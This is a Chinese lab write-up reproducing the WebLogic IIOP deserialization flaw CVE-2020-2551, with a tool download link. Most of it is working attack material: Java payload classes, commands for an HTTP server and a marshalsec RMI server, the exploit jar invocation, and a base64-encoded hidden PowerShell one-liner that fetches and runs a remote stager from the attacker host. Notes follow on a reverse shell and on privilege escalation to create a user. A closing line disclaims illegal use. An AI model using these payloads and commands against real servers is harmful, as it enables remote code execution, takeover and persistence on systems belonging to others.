Weblogic IIOP 反序列化
https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html
Weblogic CVE-2020-2551复现过程
靶机:windows7系统
IP地址:192.168.43.20
攻击机:windows10系统
IP地址:192.168.43.38
•工具下载地址https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取码:03vx
exp.java
marshalsec-0.0.3-SNAPSHOT-all.jar
weblogic_CVE_2020_2551.jar
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
javac exp.java -source 1.6 -target 1.6
python -m SimpleHTTPServer 80
python3 -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.43.38/#exp" 1099
java -jar weblogic_CVE_2020_2551.jar 192.168.43.20 7001 rmi://192.168.43.38:1099/exp
//java -jar weblogic_CVE_2020_2551.jar 靶机IP地址 靶机端口 RMI服务
1、启动cs团队服务器、客户端,生成powershell运行后门命令
Runtime.getRuntime().exec()函数解决
http://www.jackson-t.ca/runtime-exec-payloads.html
详情见Apache Shiro 反序列化漏洞复现(CVE-2016-4437)
https://www.cnblogs.com/renhaoblog/p/12971152.html
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADMAOAA6ADgAMAAvAGEAJwApACkAIgA="});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
•4、利用weblogic CVE-2020-2551漏洞反弹shell
•1、遇到创建用户失败,利用rundll32.exe进行用户提权
•2、用户创建成功
Weblogic CVE-2020-2551复现
https://blog.csdn.net/weixin_44677409/article/details/106493733
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担